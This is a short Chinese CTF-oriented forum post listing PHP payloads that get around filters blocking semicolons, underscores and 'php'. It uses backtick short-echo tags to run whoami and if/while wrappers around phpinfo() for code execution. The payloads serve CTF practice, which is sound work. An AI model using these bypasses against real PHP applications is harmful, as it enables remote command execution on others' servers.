记录奇奇怪怪php
适用人群:CTFer已知:
php代码中不允许出现; (分号),_,php,等等
问如何构造危险函数:
案例:
<?=`whoami`?> 造成无分号命令执行
<?=`whoami` 造成无分号无结尾命令执行
其他函数:
<?= if(phpinfo()){} 利用if语句绕过分号的拦截,代码执行
<?= while(phpInfo()){} 造成代码执行
http://cdn.u1.huluxia.com/g4/M02/84/87/rBAAdmCbIg2AI7SIAAE4YaFqB44418.jpg
页:
[1]